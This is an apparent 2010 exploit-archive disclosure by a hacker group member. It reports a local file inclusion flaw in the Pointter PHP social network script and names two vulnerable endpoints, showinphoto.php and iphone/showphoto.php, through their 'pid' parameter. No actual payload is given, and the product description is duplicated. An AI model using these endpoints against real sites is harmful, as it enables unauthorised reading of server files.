1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
Name : pointter Social network LFI Vulnerablility
Date : july, 2 2010
Critical Level  : HIGH
Vendor Url : http://www.pointter.com/
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr
greetz to :**RoAd_KiLlEr**,www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description:
 
Pointter is a PHP-based social network platform that lets you create a social network on your website. Right out of the box, your social network will offer nearly all of the features found on today's wildly popular social networks
 
Apple Iphone Pointter is a PHP-based social network platform that lets you create a social network on your website. Right out of the box, your social network will offer nearly all of the features found on today's wildly popular social networks

###############################################################################################################
 
Xploit:  LFI Vulnerability
 
DEMO URL :http://server/showinphoto.php?pid=[LFI]
DEMO URL :http://server/iphone/showphoto.php?pid=[LFI]
 
###############################################################################################################
# 0day no more
# Sid3^effects